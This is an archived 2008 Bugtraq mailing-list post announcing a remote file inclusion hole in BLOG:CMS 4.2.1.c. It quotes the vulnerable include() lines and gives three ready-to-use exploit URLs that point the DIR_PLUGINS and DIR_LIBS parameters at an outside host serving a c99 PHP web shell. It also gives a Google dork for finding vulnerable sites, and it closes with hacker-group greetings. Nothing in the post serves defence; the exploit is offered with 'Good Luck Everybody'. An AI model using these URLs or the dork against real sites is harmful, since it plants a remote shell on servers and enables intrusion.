| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 21 Jan 2008 05:49:56 +0300 From: رومانسي هكر <rxhr@...mail.com> To: <bugtraq@...urityfocus.com> Subject: BLOG:CMS 4.2.1.c (DIR_PLUGINS) Multiple Remote File Include # Name : BLOG:CMS 4.2.1.c (DIR_PLUGINS) Multiple Remote File Include # Download From : http://dfn.dl.sourceforge.net/sourceforge/blogcms/blogcms.4.2.1.c.7z Or Here http://blogcms.com # Found By : RoMaNcYxHaCkEr We Are H-T TeaM (Houssamix - ToXiC) # Home Page : Not Yet :( Tryag.cc/cc No-Hack.net V99x.com/vb Hackteach.org/cc Google Dork : Powered by Personal Content Management System © 2003-2005 Radek Hul?n ============================================================================ # Vulne Code In Files index.php & media.php & server.php : index.php In Line 19 : include($DIR_PLUGINS."related/nusoap.php"); media.php In Line 32 : include($DIR_LIBS . 'MEDIA.php'); server.php In Line 69 : include($DIR_LIBS . "xmlrpc.inc.php"); include($DIR_LIBS . "xmlrpcs.inc.php"); # Exploit : http://Www.RxH.CoM/blogcms/index.php?DIR_PLUGINS=http://no-hack.net/shells/c99.txt? http://Www.RxH.CoM/blogcms/admin/media.php?DIR_LIBS=http://no-hack.net/shells/c99.txt? http://Www.RxH.CoM/blogcms/admin/xmlrpc/server.php?DIR_LIBS=http://no-hack.net/shells/c99.txt? That,s It,s Good Luck Everybody ============================================================================ # Greet To : "Cold Z3ro My Master , !!Hack-back!!" (Hackteach.org) Tryag TeaM :"Mahmood_ali , cRMINEL_NET , Mohajer22 , Dr-Ha!l , LoVeRs Hacker , Abdullah00 , Athabi Ker , Mr-Wolf ...etc" (Tryag.com) Hack15 TeaM :"GeNiUs-HaCkEr , Mr-AljoOOker , Mr-Shares , So9or , KsA HaCkEr ...etc" (V99x.com) Sniper-Sa TeaM :"Sniper-sa , Golden-Hacker , Sho3ter , VerySecret , nOUR-Ice ....etc"(Sniper-sa.com) Yee7 TeaM : "ShockShadow ( My Best Friend ), HoUrIcAn , ...etc"(Yee7.com) H-T TeaM : " Houusamix , ToXiC "(no-hack.net) Str0ck (Milw0rm.com) Also: Saudi Kafo , Adel Alroh , Mr-Google , Kill eye , AlQaTaRi , God-Father And All My Friends # For Contact : RxH@...Mail.iT # Note : Alwayse Don,t See In The Top To Feeling Pain In Your Neck !!! Best Wishes _________________________________________________________________ Express yourself instantly with MSN Messenger! Download today it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/
Powered by blists - more mailing lists